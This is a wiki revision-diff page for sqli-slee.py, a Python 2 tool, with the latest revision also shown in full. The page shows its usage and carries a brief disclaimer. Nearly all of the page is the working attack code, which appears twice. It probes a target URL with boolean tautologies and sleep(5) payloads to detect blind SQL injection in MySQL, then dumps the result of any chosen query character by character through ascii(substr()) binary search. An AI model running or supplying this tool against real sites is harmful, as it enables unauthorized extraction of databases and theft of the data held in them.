Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "SQL injection/mysqli-blindutils/sqli-slee.py"

From NetSec
Jump to: navigation, search
(Source)
 
(12 intermediate revisions by 4 users not shown)
Line 1: Line 1:
{{info|<center>This script uses time and boolian based blind [[SQL injection]] to obtain the desired information from MySQL database.</center>}}
+
{{info|<center>This [[python]] script uses time and [[boolean enumeration|boolean]] based blind [[SQL injection]] to obtain the desired information from [[MySQL]] [[database]]s.</center>}}
 +
 
 +
<font size="-2">Special thanks to [[User:Dilon|Dilon]] for this tool.</font>
  
 
=Info=
 
=Info=
 +
{{main|mysqli-blindutils}}
 
The syntax of this script is:
 
The syntax of this script is:
   python bsqli.py -u [url] -i [injection]
+
   python sqli-slee.py -u [url] -i [injection]
 
==Example==
 
==Example==
   python bsqli.py -u "http://target.com/?id=1%27" -i "select database()"
+
   python sqli-slee.py -u "http://target.com/?id=1%27" -i "select database()"
  
 
==Disclaimer==
 
==Disclaimer==
Line 12: Line 15:
 
=Source=
 
=Source=
 
{{code|text= <source lang="python">
 
{{code|text= <source lang="python">
#!/usr/bin/python
+
#!/usr/bin/python2.7
 
+
import sys,re,urllib,urllib2,string,time
+
import sys,re,urllib2,string,time
 
from optparse import OptionParser
 
from optparse import OptionParser
 
from urllib2 import Request,urlopen,URLError,HTTPError
 
from urllib2 import Request,urlopen,URLError,HTTPError
 
+
 
def request(URL):
 
def request(URL):
useragent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
+
    user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
req = urllib2.Request(URL, None, useragent)
+
    req = urllib2.Request(URL, None, user_agent)
try:
+
  request=urllib2.urlopen(req)
+
except HTTPError,  e:
+
  print('[!] The server couldnt fulfill the request.')
+
  print('[!] Error code: '+str(e.code))
+
  sys.exit(1)
+
except URLError,  e:
+
  print('[!] We failed to reach a server.')
+
  print('[!] Reason: '+str(e.reason))
+
  sys.exit(1)
+
return len(request.read())
+
  
 +
    try:
 +
        request = urllib2.urlopen(req)
 +
 +
    except HTTPError, e:
 +
        print('[!] The server couldnt fulfill the request.')
 +
        print('[!] Error code: ' + str(e.code))
 +
        sys.exit(1)
 +
 +
    except URLError, e:
 +
        print('[!] We failed to reach a server.')
 +
        print('[!] Reason: ' + str(e.reason))
 +
        sys.exit(1)
 +
 +
    return len(request.read())
 +
 
def value(URL):
 
def value(URL):
target=0
+
    target = 0
end=0
+
    end = 0
nextmaybe=0
+
    next_maybe = 0
floor=0
+
    floor = 0
ceiling=255
+
    ceiling = 255
maybe = int(ceiling)/2
+
    maybe = int(ceiling)/2
while(1):
+
 
end+=1
+
    while(end != 9):
if(end==9):
+
        if(is_what(URL, maybe, '>')):
return 'done'
+
            floor = maybe
  if iswhat(URL, maybe, '>'):
+
            next_maybe = int(maybe + ((ceiling - floor)/2))
    floor = maybe
+
 
    nextmaybe = int(maybe + ((ceiling - floor)/2))
+
        elif(is_what(URL, maybe, '<')):
  elif iswhat(URL, maybe, '<'):
+
            ceiling = maybe
    ceiling = maybe
+
            next_maybe = int(maybe - ((ceiling - floor)/2))
    nextmaybe = int(maybe - ((ceiling - floor)/2))
+
 
  elif iswhat(URL, maybe, '='):
+
        elif(is_what(URL, maybe, '=')):
    return chr(maybe)
+
            return chr(maybe)
  maybe = nextmaybe
+
 
 +
        maybe = next_maybe
 +
        end += 1
 +
 
 +
    return 'done'
 +
 +
def is_what(URL, maybe, op):
 +
    if(sqli_type == 'boolean'):
 +
        ValueResponse = int(request(str(URL) + str(op) + str(maybe) + '--+'))
 +
        if(TrueResponse == ValueResponse):
 +
            return 1
 +
        else:
 +
            return 0
 +
    elif(sqli_type == 'time'):
 +
        start = time.time()
 +
        ValueResonse = request(str(URL) + str(op) + str(maybe) + ')*2)--+')
 +
        elapsed_time = (time.time() - start)
 +
        if (elapsed_time > 2):
 +
            return 1
 +
        else:
 +
            return 0
 +
 +
def vuln_check(URL):
 +
    print('[+] Checking site...')
  
def iswhat(URL,maybe,op):
+
    global TrueResponse
if(sqlitype=='boolian'):
+
    TrueResponse = int(request(URL + '%20AND%2043%20like%2043--+'))
  ValueResponse=int(request(str(URL)+str(op)+str(maybe)+'--+'))
+
    FalseResponse = int(request(URL + '%20AND%2034%20like%2043--+'))
  if(TrueResponse==ValueResponse):
+
    return 1
+
  else:
+
    return 0
+
elif(sqlitype=='time'):
+
start = time.time()
+
  ValueResonse=request(str(URL)+str(op)+str(maybe)+')*2)--+')
+
  elapsedtime = (time.time() - start)
+
  if (elapsedtime > 2):
+
    return 1
+
  else:
+
    return 0
+
  
def vulncheck(URL):
+
    if(TrueResponse != FalseResponse):
print('[+] Checking site...')
+
        print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
global TrueResponse
+
        return 'boolean'
TrueResponse=int(request(URL+'%20AND%2043%20like%2043--+'))
+
    else:
FalseResponse=int(request(URL+'%20AND%2034%20like%2043--+'))
+
        start = time.time()
if(TrueResponse!=FalseResponse):
+
        SleepResponse = request(URL + '%20and%20sleep(5)--+')
  print('[+] Site seems to be vulnerable to boolian based blind SQL injection.')
+
        elapsed_time = (time.time() - start)
  return 'boolian'
+
else:
+
  start = time.time()
+
  SleepResponse=request(URL+'%20and%20sleep(5)--+')
+
  elapsedtime = (time.time() - start)
+
  if (elapsedtime > 5):
+
    print('[+] Site seems to be vulnerable to time based blind SQL injection.')
+
    return 'time'
+
  else:
+
    print('[!] Seems like site isnt vulnerable to blind SQL injection.')
+
    sys.exit(1)
+
  
 +
        if(elapsed_time > 5):
 +
            print('[+] Site seems to be vulnerable to time based blind SQL injection.')
 +
            return 'time'
 +
        else:
 +
            print('[!] Seems like site isnt vulnerable to blind SQL injection.')
 +
            sys.exit(1)
 +
 
def main():
 
def main():
print('''
+
    print('''
Auto BSQLi tool for MySQL
+
                Auto BSQLi tool for MySQL
      ''')
+
                ''')
 +
 +
    usage = 'usage: %prog -u <target> -i <injection>'
 +
    parser = OptionParser(usage=usage)
 +
    parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"')
 +
    parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"')
 +
 +
    (options, args) = parser.parse_args()
 +
    if(options.URL and options.INJECTION):
 +
        URL = options.URL
 +
        INJECTION = urllib2.quote(options.INJECTION.encode("utf8"))
 +
    else:
 +
        print('[!] Missing url or injection parameter.')
 +
        print('[!] Use --help.')
 +
        sys.exit(1)
 +
 +
    global sqli_type
 +
    sqli_type = vuln_check(URL)
 +
    position = 1
 +
    dump = ''
 +
    print('[+] Dumping data...')
  
usage = 'usage: %prog -u <target> -i <injection>'
+
    while(1):
parser = OptionParser(usage=usage)
+
        if(sqli_type == 'boolean'):
parser.add_option("-u", action="store", type="string", dest="URL",
+
            letter = value(URL + '%20and%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
help='"http://site.tld/index.php?id=1%27"')
+
        elif(sqli_type == 'time'):
parser.add_option('-i', action='store', type='string', dest='INJECTION',
+
            letter = value(URL + '%20and%20sleep((select%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
help='"select version()"')
+
  
(options, args) = parser.parse_args()
+
        if(letter == 'done'):
if options.URL and options.INJECTION:
+
            break
  URL=options.URL
+
  INJECTION=urllib2.quote(options.INJECTION.encode("utf8"))
+
else:
+
  print('[!] Missing url or injection parameter.')
+
  print('[!] Use --help.')
+
  sys.exit(1)
+
  
global sqlitype
+
        dump = dump + letter
sqlitype=vulncheck(URL)
+
        position += 1
position=1
+
dump=''
+
print('[+] Dumping data...')
+
while(1):
+
if(sqlitype=='boolian'):
+
letter=value(URL+'%20and%20ascii(substr(('+INJECTION+')%20from%20'+str(position)+'%20for%201))')
+
  elif(sqlitype=='time'):
+
    letter=value(URL+'%20and%20sleep((select%20ascii(substr(('+INJECTION+')%20from%20'+str(position)+'%20for%201))')
+
if(letter=='done'):
+
break
+
    dump=dump+letter
+
  position+=1
+
if(dump):
+
print('[+] Data: '+dump)
+
else:
+
print('[!] No data dumped. Check your injection.')
+
  
 +
    if(dump):
 +
        print('[+] Data: ' + dump)
 +
    else:
 +
        print('[!] No data dumped. Check your injection.')
 +
 
if __name__ == "__main__":
 
if __name__ == "__main__":
 
     main()
 
     main()
 
</source>}}
 
</source>}}

Latest revision as of 02:57, 21 November 2012

c3el4.png
This python script uses time and boolean based blind SQL injection to obtain the desired information from MySQL databases.

Special thanks to Dilon for this tool.

Info

Main article: mysqli-blindutils

The syntax of this script is:

 python sqli-slee.py -u [url] -i [injection]

Example

 python sqli-slee.py -u "http://target.com/?id=1%27" -i "select database()"

Disclaimer

RPU0j.png The end-user is liable for his-or her own actions with the use of this software. Running this against a system you do not own without written authorization is a criminal act.

Source

 
#!/usr/bin/python2.7
 
import sys,re,urllib2,string,time
from optparse import OptionParser
from urllib2 import Request,urlopen,URLError,HTTPError
 
def request(URL):
    user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
    req = urllib2.Request(URL, None, user_agent)
 
    try:
        request = urllib2.urlopen(req)
 
    except HTTPError, e:
        print('[!] The server couldnt fulfill the request.')
        print('[!] Error code: ' + str(e.code))
        sys.exit(1)
 
    except URLError, e:
        print('[!] We failed to reach a server.')
        print('[!] Reason: ' + str(e.reason))
        sys.exit(1)
 
    return len(request.read())
 
def value(URL):
    target = 0
    end = 0
    next_maybe = 0
    floor = 0
    ceiling = 255
    maybe = int(ceiling)/2
 
    while(end != 9):
        if(is_what(URL, maybe, '>')):	
            floor = maybe
            next_maybe = int(maybe + ((ceiling - floor)/2))
 
        elif(is_what(URL, maybe, '<')):
            ceiling = maybe
            next_maybe = int(maybe - ((ceiling - floor)/2))
 
        elif(is_what(URL, maybe, '=')):
            return chr(maybe)
 
        maybe = next_maybe
        end += 1
 
    return 'done'
 
def is_what(URL, maybe, op):
    if(sqli_type == 'boolean'):
        ValueResponse = int(request(str(URL) + str(op) + str(maybe) + '--+'))
        if(TrueResponse == ValueResponse):
            return 1
        else:
            return 0
    elif(sqli_type == 'time'):
        start = time.time()
        ValueResonse = request(str(URL) + str(op) + str(maybe) + ')*2)--+')
        elapsed_time = (time.time() - start)
        if (elapsed_time > 2):
            return 1
        else:
            return 0
 
def vuln_check(URL):
    print('[+] Checking site...')
 
    global TrueResponse
    TrueResponse = int(request(URL + '%20AND%2043%20like%2043--+'))
    FalseResponse = int(request(URL + '%20AND%2034%20like%2043--+'))
 
    if(TrueResponse != FalseResponse):
        print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
        return 'boolean'
    else:
        start = time.time()
        SleepResponse = request(URL + '%20and%20sleep(5)--+')
        elapsed_time = (time.time() - start)
 
        if(elapsed_time > 5):
            print('[+] Site seems to be vulnerable to time based blind SQL injection.') 
            return 'time'
        else:
            print('[!] Seems like site isnt vulnerable to blind SQL injection.')
            sys.exit(1)
 
def main():
    print('''
                Auto BSQLi tool for MySQL
                ''')
 
    usage = 'usage: %prog -u <target> -i <injection>'
    parser = OptionParser(usage=usage)
    parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"')
    parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"')
 
    (options, args) = parser.parse_args()
    if(options.URL and options.INJECTION):
        URL = options.URL
        INJECTION = urllib2.quote(options.INJECTION.encode("utf8"))
    else:
        print('[!] Missing url or injection parameter.')
        print('[!] Use --help.')
        sys.exit(1)
 
    global sqli_type
    sqli_type = vuln_check(URL)
    position = 1
    dump = ''
    print('[+] Dumping data...')
 
    while(1):
        if(sqli_type == 'boolean'):
            letter = value(URL + '%20and%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
        elif(sqli_type == 'time'):
            letter = value(URL + '%20and%20sleep((select%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
 
        if(letter == 'done'):
            break
 
        dump = dump + letter
        position += 1
 
    if(dump):
        print('[+] Data: ' + dump)
    else:
        print('[!] No data dumped. Check your injection.')
 
if __name__ == "__main__":
    main()